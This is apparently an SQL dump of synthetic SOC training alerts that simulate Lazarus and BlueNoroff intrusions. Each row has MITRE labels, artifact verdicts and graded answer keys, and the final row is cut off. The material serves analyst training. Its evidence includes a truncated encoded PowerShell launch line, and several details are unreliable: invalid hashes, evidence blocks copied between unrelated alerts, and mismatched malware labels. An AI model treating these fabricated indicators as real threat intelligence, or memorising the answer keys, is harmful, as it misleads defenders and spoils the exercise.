(1358, 'Establishing Persistence Mechanism', 'high', 'System Registry Logs', 'Using AppleJeus, BlueNoroff modifies system startup configurations in the registry to maintain persistent access even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:03Z\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"action\":\"modify\",\"username\":\"compromised_user\",\"filename\":\"applejeus.exe\",\"file_hash\":\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"malware_name\":\"AppleJeus\",\"attacker_group\":\"BlueNoroff\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP used by BlueNoroff group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with AppleJeus.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"applejeus.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Executable used by AppleJeus malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1359, 'Lateral Movement Detected', 'high', 'Internal Network Traffic Analysis', 'The attackers leverage stolen credentials to move laterally across the network, seeking to compromise additional hosts and expand their control. Anomalous internal traffic patterns and unauthorized access attempts have been detected.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.23\",\"username\":\"jdoe\",\"event_type\":\"logon\",\"authentication_package\":\"NTLM\",\"logon_type\":\"3\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"file_hash\":\"3e7a3f4fbe5e4a1b9f9b6d8f4b1d5e9c\",\"external_ip\":\"203.0.113.45\",\"details\":\"Suspicious lateral movement detected with compromised credentials using NTLM authentication.\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Known internal IP associated with the compromised user account.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for compromise.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"suspicious\",\"details\":\"User credentials were used in an unauthorized manner.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor infrastructure.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3e7a3f4fbe5e4a1b9f9b6d8f4b1d5e9c\",\"is_critical\":true,\"osint_result\":{\"source\":\"file reputation service\",\"verdict\":\"malicious\",\"details\":\"Hash matches a known malware sample used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1360, 'Data Exfiltration in Progress', 'high', 'Outbound Network Traffic Monitoring', 'In the final stage of their operation, BlueNoroff initiates the exfiltration of sensitive cryptocurrency-related data, aiming to transmit it to their external command and control servers.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"src_ip\":\"10.0.2.15\",\"dest_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":\"44321\",\"dest_port\":\"443\",\"username\":\"jdoe\",\"exfiltrated_file\":\"crypto_wallets.dat\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9f6a1c3f4\",\"malware_family\":\"BlueNoroff\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known command and control server used by BlueNoroff.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"crypto_wallets.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive cryptocurrency data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9f6a1c3f4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash linked to BlueNoroff malware activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1361, 'Initial Access via Trojanized Trading App', 'high', 'Endpoint Detection and Response (EDR)', 'A cryptocurrency trading application, \'TradePlusPro\', has been identified as being trojanized with malware attributed to the Lazarus Group. Affected systems are at risk of further exploitation. The application was downloaded from an unofficial source, leading to the initial compromise.', 'Malware Installation', 'T1203 Exploitation for Client Execution', 1, 'Closed', 178, '{\"timestamp\":\"2023-10-12T10:32:45Z\",\"event_id\":\"4625\",\"system\":{\"os\":\"Windows 10\",\"hostname\":\"DESKTOP-9LJK23A\",\"internal_ip\":\"192.168.1.45\"},\"user\":{\"username\":\"jdoe\",\"user_id\":\"S-1-5-21-3141592653-589793238-462643383-1001\"},\"file\":{\"name\":\"TradePlusPro_Setup.exe\",\"path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\TradePlusPro_Setup.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"network\":{\"remote_ip\":\"203.0.113.45\",\"port\":\"443\",\"protocol\":\"HTTPS\"},\"malware\":{\"name\":\"Lazarus_Trojan\",\"description\":\"Trojanized trading application used to gain initial access to cryptocurrency traders\' systems.\"}}', '2026-03-01 23:02:30', '2026-03-03 08:42:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Vendor AV\",\"verdict\":\"malicious\",\"details\":\"Hash of known malicious installer associated with trojanized software.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"TradePlusPro_Setup.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of trojanized software used by APTs.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1362, 'Execution of Remote Access Trojan (RAT)', 'critical', 'Network Traffic Analysis', 'Once installed, the trojan activates a Remote Access Trojan (RAT), allowing Lazarus operatives to execute commands and maintain persistence on compromised machines. The RAT communicates with a known malicious IP associated with Lazarus Group activity.', 'Malware Execution', 'T1219 - Remote Access Tools', 1, 'Closed', 178, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"185.100.87.202\",\"protocol\":\"HTTP\",\"uri\":\"/command/control\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"b9f7b3e3f5ab4a3a8f1a2f4e2a7b9d8c\",\"username\":\"jdoe\",\"filename\":\"rat_executable.exe\",\"action\":\"C2 Communication\"}', '2026-03-01 23:02:30', '2026-03-03 08:44:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.202\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b9f7b3e3f5ab4a3a8f1a2f4e2a7b9d8c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches a known Lazarus Group RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"rat_executable.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Filename associated with RAT deployment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1363, 'Persistence through Credential Theft', 'high', 'SIEM Logs', 'An advanced persistent threat actor, identified as part of the Lazarus Group, has been observed harvesting credentials from an infected device to secure a foothold for lateral movement within the organization\'s digital environment. This tactic is indicative of their strategy to maintain long-term access and prepare for financial theft or destructive operations.', 'Credential Access', 'T1110: Brute Force', 1, 'Closed', 178, '{\"timestamp\":\"2023-10-11T14:32:00Z\",\"event_type\":\"authentication_failure\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"username\":\"jdoe\",\"failed_attempts\":5,\"method\":\"dictionary_attack\",\"associated_malware\":{\"name\":\"WannaCry\",\"hash\":\"f7a2edb1b4567e2d5f8e8497c9a3f378\",\"filename\":\"wannacry.exe\"},\"indicator_of_compromise\":[\"source_ip\",\"associated_malware\"]}', '2026-03-01 23:02:30', '2026-03-03 08:46:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by Lazarus Group for credential theft operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account targeted in the attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f7a2edb1b4567e2d5f8e8497c9a3f378\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry ransomware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable name used by WannaCry ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:54:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:53:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:52:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:51:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1364, 'Lateral Movement with Compromised Accounts', 'high', 'Active Directory Monitoring', 'An advanced lateral movement attempt was detected where compromised accounts were used to access blockchain developer networks. The attackers are leveraging stolen credentials to exfiltrate sensitive data and exploit vulnerabilities within the blockchain development environment.', 'Account Compromise', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:00Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"user\":\"dev_jdoe\",\"source_ip\":\"45.76.154.92\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"cmd.exe\",\"file_name\":\"blockchain_project.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"domain\":\"blockchain.local\",\"status\":\"Success\"}', '2026-03-01 23:02:30', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"dev_jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised developer account used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.154.92\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP used by Lazarus Group for cyber operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially unwanted applications.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"blockchain_project.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unknown file accessed during the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1365, 'Exfiltration of Cryptocurrency Assets', 'critical', 'Cryptocurrency Transaction Monitoring', 'The final stage of the operation involves exfiltrating cryptocurrency assets from compromised wallets to accounts controlled by the Lazarus Group. The transaction monitoring system detected a suspicious transfer of 50 BTC from a previously compromised wallet to an address associated with known malicious activity.', 'Data Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:45:00Z\",\"transaction_id\":\"tx1234567890abcdef\",\"source_wallet\":\"1A2b3C4d5E6F7G8H9I0J\",\"destination_wallet\":\"3K4m5N6o7P8Q9R0S1T2U\",\"amount\":\"50 BTC\",\"transaction_fee\":\"0.0005 